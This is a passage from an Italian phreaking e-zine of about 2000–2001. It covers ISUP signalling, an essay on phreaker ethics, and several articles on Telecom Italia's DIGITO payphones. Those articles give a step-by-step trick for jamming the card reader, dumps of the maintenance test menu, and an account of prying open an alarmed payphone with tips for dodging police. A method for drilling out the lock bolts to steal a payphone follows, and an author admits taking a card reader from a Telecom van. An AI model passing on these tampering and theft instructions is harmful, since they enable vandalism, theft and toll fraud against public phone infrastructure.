stato di inattività in preparazione alla prossima chiamata.
I messaggi ISUP possono anche essere trasmessi durante la fase di connessione
della chiamata (ad esempio, tra i messaggi di risposta (ANM) e rilascio (REL)
ISUP).

- Formato dei Messaggi ISUP.

L'informazione ISUP è portata nel campo informazioni di segnale (SIF) di un
MSU. Il SIF contiene l'etichetta di instradamento seguita da un codice di
identificazione del circuito (CIC) a 14-bit (ANSI) o 12-bit (ITU). Il CIC
indica il circuito di collegamento riservato dallo switch originante per
portare la chiamata. Il CIC è seguito dal campo tipo di messaggio (esempio,
IAM, ACM, ANM, REL, RLC) che definisce i contenuti del resto del messaggio.

Figura 9.

Ciascun messaggio ISUP contiene la parte fissa ingiuntiva contenente
ingiuntiva di lunghezza fissa. A volte la parte fissa ingiuntiva comprende
solo il campo del tipo di messaggio. La parte fissa ingiuntiva può essere
seguita dalla parte ingiuntiva variabile e/o dalla parte opzionale. La parte
ingiuntiva variabile contiene parametri ingiuntivi di lunghezza variabile.
La parte opzionale contiene parametri opzionali che sono identificati da un
codice di parametro a 1 ottetto seguito da un indicatore di lunghezza
("ottetti che seguono"). I parametri opzionali possono ricorrere in qualsiasi
ordine. Se i parametri opzionali sono inclusi, la fine dei parametri opzionali
è indicata da un ottetto contenente tutti zeri.

Messaggio di indirizzo iniziale

Un Messaggio di Indirizzo iniziale (IAM) è mandato "avanti" da ciascuno switch
richiesto per completare il circuito tra parte chiamata e chiamante finchè il
circuito connette allo switch destinazione. Un IAM contiene il numero della
parte chiamata nella parte ingiuntiva variabile e può contenere nome e numero
della parte chiamante nella parte opzionale.

Figura 10.

- La Parte per gli utenti di ISDN continua...

- Messaggio con Indirizzo Completo.

Un Messaggio con Indirizzo Completo (ACM) è mandato nella direzione opposta
per indicare che l'estremità remota del circuito del collegamento è stata
prenotata.
Lo switch originante risponde all'ACM collegando la parte della linea
chiamante al canale per completare il circuito voce dalla parte chiamante a
quella chiamata. Lo switch originante manda anche un tono di suoneria alla
parte chiamante.

Figura 11.

Quando la parte chiamata risponde, lo switch di destinazione termina il tono
di suoneria e manda un Messaggio di Risposta (ANM) allo switch originante. Lo
switch originante inizia a tassare dopo aver verificato che la linea della
parte chiamante è connessa al canale prenotato.

Figura 12.

Un messaggio di Rilascio (REL) è mandato in entrambe le direzioni indicando
che il circuito sta essendo rilasciato per l'indicatore di causa specificato.
Un REL è mandato quando o la parte chiamante o quella chiamata chiude la
conversazione (causa = 16). Un REL è anche mandato nella direzione opposta se
la parte di linea chiamata è occupata (causa = 17).

Figura 13.

- Messaggio di Rilascio Completo.
Un Messaggio di Rilascio Completo (RLC) è mandato nella direzione opposta del
REL per attestare il rilascio dell'estremità remota di un circuito di
collegamento e termina il ciclo di tassazione come appropriato.

Figura 14.

- Parte per gli utenti del telefono.

In alcune parti del mondo (ad esempio la Cina), la Parte per gli Utenti del
Telefono (TUP) supporta il processo di chiamata semplice. La TUP tratta solo
circuiti analogici; i circuiti digitali e le capacità di trasmissione dati
sono fornite dalla Parte per gli Utenti Dati.


[ BsThack ( 2a parte )
[ ...e zio`sP3nKy ( 1a parte )



.----------------------------------------------------------[ PhreaKinG ]-----.
| ETICA PHREAKER |
*---------------------------[ {Che} ]--[gimli_figlio_di_gloin@katamail.com]--*


Premessa: credo che questo mio articolo scatenera' in alcuni di voi,
spesso piu' esperti di me, grosse ire. Ma io lo scrivo lo stesso
poiche' credo che questo argomento non sia mai affrontato seriamente.

Ma siamo sicuri che i phreaker abbiano d'avvero un'etica?
Ma, soprattutto, chi sono i veri phreakers?
(Voglio innanzitutto dire che parlando di phreaking, mi riverisco
solo e soltanto a quello italiano, poiche' le mie conoscenze
dell'estero sono pressoche' nulle. )

Due domande di non facile risposta e cerchero' di iniziare dalla prima.
Si definisce "hacker" colui che possiede una grande conoscenza del
mondo informatico bla bla bla.
Quindi, per analogia: si definisce "phreaker" colui che ha una
grande conoscenza dei sistemi di comunicazione (principalmente
telefonica, ma non solo) bla bla bla.
Arrivato a questo punto posso con sicurezza affermare che io e la
stragrande maggioranza di quelli che stanno leggendo non sono
sicuramente phreaker. Non siete convinti?
Bene, allora spiegatemi come funziona il protocollo CCIT\non_so_
neanche_la_sigla.
Questa e' una delle tante domande (ed immagino neanche tra le piu'
complesse domande a cui un vero phreaker risponderebbe in un
battibaleno.
Aprire delle centraline o spaccare un rotor per fare qualche telefonata
a scrocco non mi sembra la cosa piu' avanzata che potremmo fare
nell'era echelon.
Il fatto che non ho mai trovato un articolo sui protocolli in italiano
o su qualcosa che vada al di la del semplice "apri-telefona", oppure
"green-telefona", e' un qualcosa che mi fa pensare.
Eppure in inglese i documenti sono presenti: non credo che
il numero 35 di "phreak" (una rivista americana - o inglese?-) parli
ancora di centraline o cabine.

Il problema vero e' che in italia si pensa al phreaking come
lo sfruttamento a scopo di lucro delle linee altrui, nel migliore
dei casi delle linee telecom; a nessuno e' mai venuto in mente
che il phreaking dovrebbe essere principalmente lo STUDIO della
struttura delle compagnie?
Probabilmente, siamo quasi tutti CRACKER anzi, viste le nostre
conoscenze, LAMER; le poche persone che non lo sono, stanno dietro le
quinte ad osservare questo schifo che distrugge la filosofia dei
phreaker veri.

Ma se qualcuno che ha studiato e concepisce il phreaking in modo
c'e', forse farebbe meglio a farsi vivo e a cercare di cambiare
questo luogo comune, questa merda.

[ Ernesto {Che} Guevara de la Sierna ]


.----------------------------------------------------------[ PhreaKinG ]-----.
| DIGITO: TRUST NO ONE |
*----------------------------------[ radioZer[0] ]--[RadioZero@virgilio.it]--*

Da circa un paio di mesi, mamma telekom sta rimpiazzando i vecchi telefoni
pubblici arancioni, con dei nuovi telefoni dalla linea estetica accativante
ed attraente. Su questi telefoni se ne sono dette molte [e pure io in qualche
occasione ho detto qualcosa] alcune delle quali devono ancora trovare una
risposta. Ecco il motivo del mio articolo: piazzare le basi sull'informazione
di questi telefoni, in modo che chiunque possa ampliarle con la propria
esperienza. Proprio per questo motivo, andrò a ripetere cose già dette, ma
[forse] non scontate per chiunque... quindi non rompetemi i coglioni venendomi
a dire che sono stato ripetitivo !

Personalmente, il nuovo telefono pubblico "DIGITO" [così si chiama] l'ho
visto prima alla smau, poi in funzione nella mia città. Senza dilunguarmi
troppo, vado ad elencare qui di seguito tutte le info di cui dispongo...
elencando per ognuna i vari commenti fatti da varie persone in rete:

- Il design è stato fatto da Giugiaro e l'intero scatolotto di dimensioni di
circa 30 cm x 40 cm è interamente fatto in acciaio stagnato, ragion percui
sono propenso a credere che sarà più difficile portarsene a casa uno,
rispetto ai precedenti. Solamente la cornetta è in plastica dura.

> No comment.

- La tastiera è alfanumerica in quanto si possono anche inviare SMS, e in più
ci sono altri tasti che sulle vecchie cabine non c'erano e sono:
* il tasto per selezionare la lingua (infatti questo esisteva già!)
* il tasto per alzare/abbassare il volume
* il tasto canc ... tipo calcolatrice, che elimina l'ultimo numero
* il tasto R ... non è il repeat del numero, ma serve a riprendersi il
segnale di libero
* il tasto in/out per la scheda telefonica
* il tasto OK
* due piccoli tasti, posti sotto il display, da loro funzionamento ancora
ingoto (credo che servano per gli SMS o qualcosa del genere... quindi
dovremmo aspettare le schede a chip)

> Anche qui non c'è da dire molto. L'unica cosa ancora ingota [a me] è il
funzionamento dei due piccoli tasti posti sotto al display.

- Il display ha 4 righe e il trucco dell'overflow di 0 non funzia più.
Il numero massimo di cifre che si possono inserire [quelle che compongono
il numero telefonico] è 25.

- Per le comunicazioni utilizza una linea ISDN :) , ed è supportato dalla
Piattaforma di Rete Intelligente :( .


> Il nome di Rete Intelligente si è dato quando si sono cominciate ad usare
le tessere telefoniche, o meglio quando hanno installato dei database
contenenti tutti i numeri seriali delle tessere telefoniche e il loro
rispettivo credito, in modo da scalarlo anche nel database oltre che
sulla scheda. Inoltre, questa Rete permette anche di differenziare le
tariffe delle chiamate a seconda della destinazione.

- Il lettore di schede non ha più la classica entrata per le schede sopra, e
l'uscita sotto, infatti è composto di una sola fessura per schede; proprio
per questo motivo permette di cambiare la scheda mentre si sta conversando
senza dover agganciare.

> In dettaglio:
Dunque, da quello che ho potuto capire, il lettore di schede di 'ste
cabine è più cazzuto dei vecchi. Infatti dovrebbe funzionare così: voi
inserite la scheda, e lui non se la "succhia" tutta, ma la accetta fino a
metà. A questo punto controlla se ciò che avete inserito è una scheda che
lui riconosce, o meno: se la riconosce (ovvero è delle sue) la prende
tutta, altrimenti la "sputa" fuori, dicendovi di riagganciare.

> Per quanto riguarda il cambio della scheda, ecco quello che ho potuto
constatare:
Quando il vostro credito arriva a 1000 Lire o ad una cifra inferiore, il
telefono vi darà la possibilità di cambiare scheda. Per cambiare scheda
dovete premere l'ultimo pulsante in basso, a sinistra della tastiera;
così facendo esce la scheda telefonica e avete 16 secondi [circa] di
tempo per inserirne un'altra. A voi la fantasia su come utilizzare questo
"lungo" tempo ;)

- Per quanto riguarda le schede, funziona sia con le schede telekom a banda
magnetica che con le smartcard iso 7816 disponibili da dicembre 2000, con
allegati una serie di servizi di personalizzazione particolari, di cui
nessuno ha saputo dirmi niente e successivamente anche con monete euro (ma
sarà poi un altro modello).

> Vagabondando in rete, da qualche parte, mi è capitato di vedere che il
telefono è strutturato in due parti: una fissa, dedicata alle schede, e
una parte opzionale per la gestione delle monete, in euro, credo [ma
questa parte opzionale la vedremo fra un po'].

- C'è la possibilità di usufruire di vari servizi innovativi molto
interessanti, del tipo:

* Possibilità di lasciare dei messaggi vocali, che verranno inviati una
volta riagganciato l'apparecchio, verso i clienti assenti o occupati;

* Servizio di casella vocale personale, dove chiunque e da qualsiasi
numero, avrà la possibilità di lasciare un messaggio;

(e qui credo che centri la personalizzazione delle smart card ;)

- Servizio ASSURDO: una porta infrarossi per collegare portatili e palmtop
direttamente in rete (tipo presa telefonica stradale pubblica). E penso che
questo sia il vero punto che merita di essere approfondito, in fatto di
interfacciamento di un pc col telefono.
N.B. Questa info l'ho presa dai volantini pubblicitari che i telecomici
distribuivano alla smau.

> Questo è quanto sono venuto a sapere io; dal momento che l'ho reso
pubblico sono affiorati i primi commenti e le prime critiche. C'è chi ha
detto [giustamente] che di una porta IRDA non se ne vede l'ombra: bè, se
è vero che è presente una porta ad infrarossi, non credo che la mettano
bene in vista... servirebbe solo a vandali [???] per danneggiarla, no ?!
A questo punto esistono solo due casi possibili e una soluzione; i due
casi sono 1) c'è 2) non c'è. Ma va ?! Eheeh... e la soluzione: aprire un
rotor e vedere cosa c'è realmente al suon interno.
Ponendo il caso che sia vero, è altrettanto inaspettata la affermazione
che da questo telefono pubblico ci si possa collegare in rete. Ecco cosa
mi è stato detto:
[ ...diffiderei di cio'...e se fosse un mega complotto x inkiappettarci
tutti?! Insomma...mi suona strano..smartcard ( sanno palesemente ke si
possono clonare! vero anke ke pero' si sono fatti i konti in taska e
avran detto ke ci guadagnano kmq sopra... perdere mezzo miliardo di
nostre telefonate a frodo non e' ke gliene fotta mooooolto ).
...poi c'e' la porta per kollegare il palmare o il picci'...dite ke non
c'avranno pensato a kualke folle, kome noi del resto ;) , ke gioka a
far splittare per 3 ore irc.tin.it? o kualke altro mega attakko? ]

Non posso dire che ciò che mi è stato detto non sia vero, ma non escluderei
cmq il fatto della porta IRDA e del collegamento in rete.

- Altra cosa innovativa è il metodo di come fa a riagganciare il telefono. Mi
spiego: avete presente la levetta sulla quale le ormai vecchie cabine
poggiano la cornetta innescando il riaggancio? Bene, sono scomparse. Credo
che il riaggancio sia innescato magneticamente, in quanto la superficie di
appoggio è diversa da quella dell'intero scatolotto e la cornetta forse
pesa leggermente di più.

> Sì, il riaggancio è magnetico... sto già studiando qualcosina.

- Infine ho la chicca delle chicche. Siccome questo telefono è stato
progettato per essere posto anche in quei luoghi dove, a causa della loro
posizione geografica, non possono essere raggiunti da una linea fissa, al
loro interno hanno due alloggi per sim card in modo da funzionare via GSM
sui 900Mhz. Questa feature delle nuove cabine è molto interessante, anche
se comporta un grosso svantaggio, e cioè che i rotor potrebbero essere
rintracciabili con uno strumento tipo il GPS. Quindi fate molta attenzione,
se avete idea di portarvene a casa una!

> Anche qui le solite critiche... lo sò. Anche A ME SUONA MOLTO STRANO, ma
questo è quando sono venuto a sapere. Quindi, NON prendetelo come buono,
ma sappiate che può esistere la possibilità che queste cabine siano
rintracciabili dal punto di vista di locazione geografica.

- Infine, dal punto di vista "hardware", tutto ciò che sò è:

* Hanno una batteria da 6v, che dovrebbe alimentare anche le ipotetiche sim.

* Ha 2 grossi bocchettoni per attaccarci i 2 slave, un plug femmina tipo ISDN
con 4 canali (le vecchie erano 2, come le isdn tradizionale), 2 tasti di
reset, e un pulsantino per il test del lettore.
E poi resta fuori un plug femmina... che non si collega da nessuna parte.
Il plug femmina potrebbe essere per una eventuale periferica... tipo il
tanto discusso modem/fax isdn.

E la porta IRDA? Non c'è. Ovvero non c'è ancora, in quanto resta anche uno
slave piccolino, a 16 pin; questo "potrebbe" essere per una eventuale porta
IRDA opzionale.



MINI GUIDA AGLI ERRORI DELLE CABINE:

FRODE - Ah, questa è bella: se voi inserite una carta telefonica al contrario,
o inserite una qualsiasi carta che lui non riconosce, vi compare sul
display la scritta "Frode" e nella linea sotto "Riagganciare"

CONGESTIONE - Dopo 10 min che smanettavo, scrivendo numeri assurdi, mi è
venuto fuori questa scritta: "Congestione" e nella linea sotto
"Riagganciare".
Se qualcuno di voi sai qualcosa, me lo faccia sapere


TILT DELLE CABINE DIGITO...

Poco tempo fa, parlando in IRC con MrBison, è venuto fuori un discorso
abbastanza interessante che riguarda come mandare in tilt queste nuove cabine.
La tecnica, da lui escogitata, funziona e non funziona, in quanto viene
visualizzato il messaggio "Lettore fuori uso", ma poi basta sganciare e
riagganciare per fare rifunzionare il tutto. Comunque, ecco qua i passaggi:

1) Inserire una scheda a rovescio, oppure inserire un'altra scheda che lui
non legge, ma che riesca ad entrare.
Appena inserita esce scritto "Frode"

2) Rimettere la scheda dentro, tenendola premuta, spingendo sulla fessura del
lettore. Ogni volta che lui ti sputa fuori la scheda, tu spingila dentro,
continuando ad alzare e abbassare la cornetta, finche non ti viene scritto:
"Chiamata E&M attivata"

3) A questo punto continua sempre a fare le operazioni descritte nel punto "2"
ovvero tieni la scheda nel lettore con forza e continua ad agganciare e
sganciare, finche non ti viene scritto:
"Lettore fuori uso"
"Solo chiamate d'emergenza"
"Sganciare"

A questo punto la cornetta è agganciata, la tua scheda è dentro e il telefono
dice di non funzionare... peccato, appena si sgancia e riaggancia la cornetta
il telefono riprende a funzionare perfettamente, sputando la scheda.


--- CONCLUSIONI ---

Ora avete capito il titolo dell'articolo ?
Bè, 1000 dubbi e pochissime certezze... insomma diamoci da fare e cerchiamo
di scoprire bug e tricks di questo telefono, prima di loro...

- Per critiche, commenti, aggiunte e correzioni potete contattarmi in IRC nel
canale #phreak.it oppure #zapolandia o spedirmi una mail a:
RadioZero@Virgilio.It

Bye, alla prox

[ radioZer0 ]

.----------------------------------------------------------[ PhreaKinG ]-----.
| ECCO IL TEST MODE! |
*---------------------------[ Various Artists ]--[]------------------------+-*
|
PREMESSA DI OLDIRON61: Questi sono due post circa il menu del famigerato |
"Test mode" di DIGITO. |
Il primo e' di Artemis (UIC Ml), mentre il secondo |
e' di PHCV e Jeky (SP Ml) |
|
|
|
*--> 1a Versione <---[ «~{Årtêmis · 23ãm}~» <worldnew@libero.it> ]---------+
|
|
| Allora... eccovi il menù COMPLETO del menù manutenzione:
|
+=*=*=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=

#TEST COMPONENTI
»LETTORE CARTE
TEST FUNZIONALE
Introdurre la scheda...
Scheda STP non letta...

STATO ALLARMI
NON DISPONIBILE

RESET LETTORE
NON DISPONIBILE

»MODULO MONETE
TEST FUNZIONALE
Introdurre la scheda...

STATO ALLARMI
NON DISPONIBILE

RESET LETTORE
NON DISPONIBILE

»DISPLAY
(riempie il display e poi se non è danneggiato esce la scritta FINE)

»MICROTELEFONO
TEST FUNZIONALE
NON DISPONIBILE

STATO ALLARMI
GENERALE: FAIL
STRAPPO: FAIL

»LINEA
PRESENZA: OK
GENERALE: NON DISP.
COLLOQUIO: NON DISP.

»BATTERIA
VALORE CARICA: 6.85

»SPORTELLO
CHIUSO

»EEPROM/FLASH
BASE: N.D. CNT: OK
SW: N.D. DAT: OK

»DTS
GENERALE: N.D.
CODEC: N.D.
RAM: N.D.

»FAX
LAMPADA: N.D.
SCANNER: N.D.
MODEM: N.D.

»SERRATURA:
NON DISPONIBILE

»SCONTRINATRICE
NON DISPONIBILE

»C_BUS
NON DISPONIBILE

»B_BUS
LETTURA BOLLINI
LETTURA BUS1
NON DISPONIBILE

LETTURA BUS2
NON DISPONIBILE

LETTURA BUS3
NON DISPONIBILE

STATO ALLARMI BUS
NON DISPONIBILE

»GANCIO
ALZATO/ABBASSATO

»TASTIERA
AZIONARE TASTO
00
(<TRL> = USCITA)

»MODEM/AB
TEST FUNZIONALE
NON DISPONIBILE

STATO ALLARMI
NON DISPONIBILE

»MODULO BASE
RAM: OK
FLASH: OK

»REVISIONI SW/HW
[TTP-ISDN]
PIASTRA LOGICA:
SW 3.0 03-10-00
HW 2.0 REV. A

»TELEFONATA
TASSAZIONE PROVA
Introdurre carta...
Attendere prego...

CHIAMATA
Chiamata in corso...

»CONT. TELEFONATA
TASSE 642
CONV. 236

#ARCHIVI ALLARMI
ALL. TRANSISTORI
NESSUN ALLARME PRESENTE

ALL. STABILI
01) CT PREPAGATA
02) INCAGLIO CARTA
etc. etc. (date dei guasti, ed erano solo questi due guasti ripetuti
12 volte)

CONTATORI EVENTI
NO LETT. STP
IMP. NO SELEZ
IMP. NO SELEZ 2H

ALLARMI IN CORSO: OFF
+*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=+=*
|
|
|
*--> 2a Versione <---[ PHCV666 e Jeky <jeky.99@tin.it> ]---------[> |
| |
| |
| |
| |
+=*=*=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-+
test componenti:
modulo base
revisioni sw/hw piastra logica;
3.0 03-10-00
hw 2.0 rev. A
telefonata
tassazioni prova carta
chiamata
cont telefonata
tasse 261
conv 75
lettore carte
non disponibile
modulo monete
non disponibile
display
disegna quadratini fino a riempire lo schermo
microtelefono
n.d.
test funzionale
allarmi
generale:
fail
strappo:
fail
linea
presenza
ok
generale:
non disp
colloquio:
non disp

batteria
6.80
sportello:
aperto
eeprom/flash
base:
n.d.
cnt:
ok
sw:
n.d.
dat:
ok
dts
generale:
n.d.
codrc:
n.d.
ram:
n.d.
fax
lampada:
n.d.
modem:
n.d.
serratura
n.d.
scontrinatrice
n.d

c-bus
n.d.
m-bus
lettura bollini
bus1
n.d.
bus2
n.d.
bus3
n.d.
allarme
n.d.
gancio
abbassato

tastiera
dice di digitare e di premere "trl" per fine (trl=R)
modem/ab
n.d.

stato allarmi
n.d.
lettore carta
inserire scheda

archivio allarmi
all.transistori
nessuno
all.stabili
ct prepagata
01-01-01 22:31
cc commerciale
01-01-01 22:32
incaglio carta (data + ora)

contatori eventi
imp no selezionate
2-01-01 03-01-70
monete
non disp

allarmi in corso
off

Ho poi visto su altre cabine dei messaggi che ora riporto:

1)richiesta cli e verifica sw su N2TRA
mancata attivazione collegamento ISDN con la centrale

2) Scaricamento software da centrale in corso, attendere prego (e il giorno
dopo): qualcosa come "richiesto reset hardware locale" non mi ricordo bene

[ Various Artists ]

.----------------------------------------------------------[ PhReaKinG ]-----.
| CABINE DIGITO: UN FILE COME TANTI ALTRI |
*--------------------------------------[ PHCV ]--[phcv_master@hotmail.com ]--*


Ciao. Innanzitutto mi presento, sono PHCV666, presente nel panorama
underground da circa un anno e mezzo.
In questo file non faccio altro che raccogliere informazioni che sono emerse
da varie fonti, mailing list, siti web, chiaccherate in irc e prove personali.

Scusate innanzitutto per vari errori grammaticali e ortografici, ma questo
testo l'ho buttato giù come mi veniva in mente. Solita merdata del disclaimer:

(nn si sa mai) Queste informazioni sono solo a titolo educativo, io nn vi
incito a metterle in pratica, non ho mai scassinato una cabina telefonica ne
so come si fa, quindi se vi beccano è solo e soltanto colpa vostra, se perdete
una mano mentre cercate di aprire con la fiamma ossidrica una cabine nn è
colpa mia.

Ora possiamo cominciare.

La cabina digito, appare dall'esterno come un bussolotto color argento con
una cornetta rossa, un tastierino numerico e un display retroilluminato.

A differenza dei vecchi telefoni, questi presentano dei nuovi tasti:

- OK, per confermare un numero digitato
- C, per cancellare l'ultimo numero digitato
- ESPULSIONE TESSERA per togliere la scheda e sostituirla durante una
conversazione
- DUE TASTI A FORMA DI FRECCIA sotto al display; l'uso ne è ancora sconosciuto

Il tipo di interfaccia con la centrale è isdn, ma prevede anche due slot per
l'inserimento di due schede gsm per utilizzare il telefono su questa rete.
Il telefono è dotato anche di una batteria da 8 volt, per mantenere l'orario
(o per tracciarti??) Altre funzioni sono la porta ad infrarossi(non ancora
presente ma predisposta) per il collegamento a palmari, portatili e robe
simili, il supporto di carte chip oltre alle normali tessere magnetiche
( nemmeno questa funzione è già implementata)e altre cosette simili.

La serratura è un casino, di tipo a mezza spina, e il sistema di chiusura
ancora più complicato.(da mettere in evidenza però che alcuni telefoni sono
perfettamente bloccati, mentre altri hanno abbastanza lasco).

Il test mode è così strutturato:

[ Vedi Articolo "Ecco il test Mode" di Artemis e PHCV666 ...ndr ]

Interno: (le foto in allegato)

ecco una descrizione, non mia, ma molto chiara di radioZer0

[ Vedi Articolo "Digito Trust No One di RadioZer0 ...ndr ]

Tnx e continuiamo con noi:

Il telefono è attaccato al muro con soli tre bulloni, quindi una volta aperto
è mooooolto facile staccarlo e portarselo via. Attenzione, però... Se fosse
così semplice, ognuno di noi avrebbe uno di questi giochini in garage.
Ecco il però: La cabina è allarmata, lo so per esperienza personale:

<esperienza personale>

Stavo cazzeggiano per la cittò. Decido di andare alla stazione. Vado. Trovo
la solita cabina in test mode. comincio a tirare qua e là e il telefono si
apre...miracolo! Il tempo di chiamare un mio amico (per far da palo), di
comprare una macchina fotografica usa e getta, ed eccomi al lavoro! Scatto un
po'di foto, la gente mi guarda male ma io continuo.altre foto, vado via per
sviare un po' i sospetti, torno e... chi si vede? la pula!! La cabina era
allarmata. Faccio finta di niente, nascondo la macchina fotografica, prendo
il primo autobus che passa e sono salvo... ma se non andavo a fare 1 giro?
ero morto...

<CONSIDERAZIONI>

1) Se dovete fare cose così fate alla svelta, primi che arrivi qualcuno
2) Non fatelo alla stazione alle 5 (cinque!!!) di pomeriggio
3) Occhio agli allarmi

</CONSIDERAZIONI>
</esperienza personale>

Come portarsi a casa 1 cabina (idea by Jeky.99 (jeky.99@tin.it))

Materiali: 1 trapano; 1 bulino; le foto della cabina aperta

Con il bulino bulinare, appunto, i punti precisi in cui si trovano i bulloni
che tengono fissa la serratura (sono solo due) Col trapano praticare due fori
in questi punti precedentemente bulinati, quindi premere sulla serratura.
ecco aperta la cabina!! (idea mai provata... se qualcuno vuole provare o ha
provato, me lo scriva, le mail sono alla fine)

Mah... non saprei cosa dire di +. se qualcuno ha qualcos'altro me lo scriva.
Ciao a tutti.
+ +
|PHCV666|
---------

Ecco le mail:
PHCV666: phcv_master@hotmail.com
Jeky.99: jeky.99@tin.it

[ PHCV666 ]




.----------------------------------------------------------[ PhreaKinG ]-----.
| ALIMENTARE UN ROTOR |
*------------------------------[ GourangA ]--[gouranga_phreak@hotmail.com ]--*


Qui non spiego come collegare un lettore schede tipo rotor al pc, ma spiego
come alimentarlo per eventuali usi (ed abusi)!!!

Innanzi tutto voglio dire che le persone che prendono un rotor ogni week-end
quando vanno in montagna commettono solo un atto di vandalismo.
Il rotor e' un piccolo stupefacente miscuglio di tecnica e ingegneria.
I rotor vengono fabbricati dalla urmet, che ha due sedi principali, una a
Roma ed una a Milano. Il lettore rotor non e' in vendita e quindi l'unico
modo per prenderlo e' andare su una cabina telefonica e usare mezzi pesanti
oppure (come è successo una volta a me) aprire lo sportello di un auto
telecom la vigilia di natale 1999 alle ore 16 circa e prendere uno scatolone,
andare a casa, aprirlo e rimanere stupiti di aver trovato un rotor col
manuale d'uso e i modi per interfacciarlo al resto della cabina (io di
lettori rotor ne ho 3).

Quel piccolo manuale mi e' stato d'aiuto a risolvere molti problemi che non
riuscivo a risolvere (che vedremo in seguito). Di lettori rotor che io
conosca ne esistono tre tipi, la differenza non e' grande, cambia solo la
data di fabbricazione e qualche dettaglio tecnico irrilevante. I primi tipi
di rotor hanno il motorino cilindrico schiacciato di colore nero e blu scuro,
i secondi tipi di rotor hanno il motorino cilindrico nero con la punta rossa
(io prendo in considerazione quelli).

Il motorino e' la parte cilindrica piu' grande che spunta dalla base verso
sinistra del rotor (sui primi tipi in alto a destra). C'e' una specie di
punta rossa, come un coperchio, che spunta e si nota alla fine del cilindro,
voi staccate quello e vedrete che ci sono due cavi di alimentazione,
rispettivo negativo e positivo (vedete di non sbagliare ad attaccare i cavi o
rischiate di fondere la scheda del rotor).
Ora andate nella ferramenta di fiducia e comprate un alimentatore da 6 volt
(o da 9 per il primo tipo). Prendete i cavi dal motorino e staccateli, al
loro posto collegateci i due cavi dell'alimentatore in modo di non errare i
poli.

Ora attaccate l'alimentatore alla presa e con grande sorpresa vedrete che si
accenderà il led rosso che segnalera' il test per vedere se si e' collegati
alla linea di trasmissione, qui vi dara' "
errore" visto che non e' collegato
da nessuna parte.

L'adattatore e' 10 25 pin (la mia com 1 e' da 25 pin e il rotor ha 10 pin),
la costruzione e' difficile e la spieghero' piu' avanti.

[ Gouranga (r) ]



.----------------------------------------------------------[ PhreaKinG ]-----.
| PHREAKING SEGRETERIE E CAZZATE VARIE |
*--------------------------------------[ mR_bIs0n ]--[chiappe666@libero.it]--*


DISCLAIMAH: l'autore e il co-autore non si assumono una cazzo di
responsabilit… sul cazzo di uso che potete fare di queste cazzo di infoz.
Buon proseguimento

AUTORE: mR_bIs0n
CO-AUTORE: Mr_Skull

CONSUMO: cioccolata fornita dalla Mr_Skull's & Co.
mR_bIs0n: sciuizzero?
Mr_Skull: si, perch‚?
mR_bIs0n: ah, vabb‚...

CASA: dipende dal momento

TEMPO: piovoso su gran parte della puglia, con forti temporali sulla testa
dei due...

CANE: quello di Skull (Whisky)

MUSICA: un pacco di Marilyn Manson, Supergrass, The Cardigans ecc...
nonch‚ il cd di Giorgio Gentile e il suo Manager, SBORRAGEL

SALUTI: quel bravo ragazzo che ‚ pankrazio, la mamma, pap… e tutti gli zii,
gli amiketti di skuola, Peppo Ficone, gli amici di #sbornia e gli
amici di #hackernow, la prof.ssa Bolognino (quindi).

FUCKS TO: quel "
simpatikokainomane" di Amicus, prof. Pietro Stano, il Timone
(immancabile), gli omini Telecom (tipo quello della barzelletta),
Danilo Bumba, Luigi Pecoraro, il preside Basile e tutta la nostra
skuola e tante belle kose...

BARZELLETTA: Pierpaolo: Senta, ci pu• installare il kit ISDN???
Omino Telekon n. P25F425: Certo, certo, comunico alla base...
(si mette a fare strani fiski)
Pierpaolo: si, ma a noi servirebbe una linea da 128kbps perch‚ noi
dovremmo spedire ai nostri clienti parecchie immagini da
alcune decine di megabytes...
P25F425: Š impossibile, qui non si tratta pi- di frequenza, sono i
digitali... (prende un foglietto di carta e una penna,
e fa delle onde) (il ritmo delle sue onde
cerebrali!ndMr_Skull) (poi inizia a scrivere: 010010110101)
Pierpaolo: si, ma io so che accoppiando i due canali ISDN si pu•
arrivare a 128 kbps...
P25F425: ma 64 sono gi… molti... ho visto io stesso come scaricavano
e mandavano gli ordini nelle farmacie...
(AHAHAH! (Risate in scatola tipo sit-com americana))
Pierpaolo: mi dispiace ma lei non Š qualificato. E poi le immagini
con cui io lavoro sono molto pi- grandi di quattro ordini...
P25F425: ... ma gli ordini andavano veloci!!!
Pierpaolo: Alessandro, andiamocene all'ufficio... Pap…, accordati tu
con questo scemo...


_.-^-._.-^-._.-^-._.-^-._.-^-.->Indice<-.-^-._.-^-._.-^-._.-^-._.-^-._.-^-.


1) Introduzione
2) Green phreak on a leash 2
3) La favoletta di MotorJovy e mR_bIs0n
4) Come si usa e abusa di una segreteria Memotel
5) Due parole sulla pericolosit… dei green
6) Come si diventa phreaker o quasi...
7) Consigli vari e forse utili
8) Saluti vari

_.-^-._.-^-._.-^-._.-^-._.-^-.->Introduzione<-.-^-._.-^-._.-^-._.-^-._.-^-.

Eccoci qua, dopo aver sorbito 30 minuti di televendite piene di asma e di
piega flash che poi vi regalano a sole 99 karte 1 pc multimediale ibm
compatibile che verr… installato solo per le prime 50 chiamate non da un
rivenditore, non da un tekniko, bens da Fiorello (con gli adesivi della
Infostrada) che parler… per ore e ore con la famosa Loredana al telefono
chiedendo cosa se ne deve fare del cd per l'abbonamento Libero (glielo dico
io cosa se ne deve fare, di quel cd... DOVREBBE FICCARSELO NEL CULO!!!!
NON VEDO CHE USO MIGLIORE POSSA FARNE UN DEVIATO MENTALE COME
LUI!!!!ndMr_Skull), siamo qui a parlarvi di kuello ke ci passa per la testa.
Ricordiamo che il programma Š sottotitolato a pagina 666 del SatanVideo.
BUONA VISIONE, BWAZWAZWAZWAZWAZWAZWAREZWAZ

-------------------------<[Green Phreak on a Leash 2]>------------------------
-Ritorno su Marte-
(mR_bIs0n: Sei sicuro che il sottotitolo ci'azzecca?)
(Mr_Skull: No! Ma lo mettiamo per fare scena...)
(mR_bIs0n: Aaaaaaah....)

Autore: mR_bIs0n
Co-Autore: Mr_Skull (ma devo essere sempre io il co-autore?)
Consumo: un po' di corrente elettrica, acqua e pane duro...
Musica ascoltata: Ministry { Bad Blood, Never Believe
Pantera { Fucking Hostile
Nine Inch Nails { Starfuckers, Inc.
